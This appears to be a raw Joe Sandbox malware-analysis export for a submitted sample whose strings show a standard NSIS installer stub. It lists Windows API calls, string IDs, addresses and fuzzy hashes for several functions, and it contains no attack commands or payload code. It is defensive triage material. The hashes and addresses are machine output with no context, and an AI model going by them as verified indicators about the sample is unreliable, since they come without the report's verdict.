                                                  • Opcode Fuzzy Hash: d5b6744e85da2abf2e39573e4029c579062b9186e575f8328d67d8fe7bc16df1
                                                  • Instruction Fuzzy Hash: 24D05E30605B10DFC328DA68D144A52B7DABB4C711F944419F86787A41CB60BD05CBC0
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                  • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                  • DeleteObject.GDI32(00000000), ref: 00404C04
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 0040508F
                                                  • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                  • ShowWindow.USER32(00000000), ref: 004050EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                  • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                  • Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                  • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403377
                                                  • SetErrorMode.KERNEL32(00008001), ref: 00403382
                                                  • OleInitialize.OLE32(00000000), ref: 00403389
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                  • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
                                                  • CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
                                                  • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
                                                  • lstrcatW.KERNEL32(00436800,Low), ref: 00403542
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
                                                  • DeleteFileW.KERNEL32(00436000), ref: 0040356F
                                                  • OleUninitialize.OLE32(?), ref: 0040361F
                                                  • ExitProcess.KERNEL32 ref: 0040363F
                                                  • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
                                                  • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
                                                  • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
                                                  • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                  • CopyFileW.KERNEL32(00437800,0041FE90,?), ref: 004036D8
                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                  • ExitProcess.KERNEL32 ref: 004037BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-1875889550
                                                  • Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                  • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                  • Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                  • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,00436800,74DF2EE0,00434000), ref: 00405799
                                                  • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 004057E1
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 00405804
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 0040580A
                                                  • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 0040581A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                  • FindClose.KERNEL32(00000000), ref: 004058C9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 2035342205-1173974218
                                                  • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                  • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                  • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                  • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-2222239885
                                                  • Opcode ID: 3b3adf585211246ae017f5c801752b33db316b27469da52f92d27096db05d5c9
                                                  • Instruction ID: f578b86aa95ef90021d1148e7d54a23ff2b708042c2e95ad20a1c460f7004e1c
                                                  • Opcode Fuzzy Hash: 3b3adf585211246ae017f5c801752b33db316b27469da52f92d27096db05d5c9
                                                  • Instruction Fuzzy Hash: A1122C74A00219CFDB14DF69C994A9DB7F2BF88344F2089B9D409AB355DB30AD86CF91
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                  • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,74DF2EE0,00405790,?,00436800,74DF2EE0), ref: 00406236
                                                  • FindClose.KERNEL32(00000000), ref: 00406242
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: WB
                                                  • API String ID: 2295610775-2854515933
                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                  • GetClientRect.USER32(?,?), ref: 0040537C
                                                  • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405420
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                    • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004054A8
                                                  • ShowWindow.USER32(00000000), ref: 004054CC
                                                  • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                  • ShowWindow.USER32(00000008), ref: 0040551B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                  • CreatePopupMenu.USER32 ref: 00405560
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                  • GetWindowRect.USER32(?,?), ref: 00405594
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                  • OpenClipboard.USER32(00000000), ref: 004055F5
                                                  • EmptyClipboard.USER32 ref: 004055FB
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                  • CloseClipboard.USER32 ref: 00405656
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                  • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                  • Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                  • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                  • ShowWindow.USER32(?), ref: 00403CAE
                                                  • DestroyWindow.USER32 ref: 00403CC2
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                  • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                  • GetDlgItem.USER32(?,?), ref: 00403DC8
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                  • EnableWindow.USER32(?,?), ref: 00403F16
                                                  • EnableWindow.USER32(?,?), ref: 00403F31
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
                                                  • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 184305955-0
                                                  • Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                  • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                  • Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                  • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                                                  APIs
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,74DF3420,00000000,00434000), ref: 00403933
                                                  • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
                                                  • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                  • GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A1A
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  • RegisterClassW.USER32(00428180), ref: 00403A57
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                  • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                  • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 914957316-1115850852
                                                  • Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                  • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                  • Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                  • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
                                                  • GetSysColor.USER32(?), ref: 004043AA
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                  • lstrlenW.KERNEL32(?), ref: 004043CB
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                  • SendMessageW.USER32(00000000), ref: 0040444D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                  • SetCursor.USER32(00000000), ref: 004044CC
                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                  • SetCursor.USER32(00000000), ref: 004044F0
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: AB@$N$open
                                                  • API String ID: 3615053054-4108209771
                                                  • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                  • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                  • wsprintfA.USER32 ref: 00405C7E
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                  Strings
                                                  Memory Dump Source
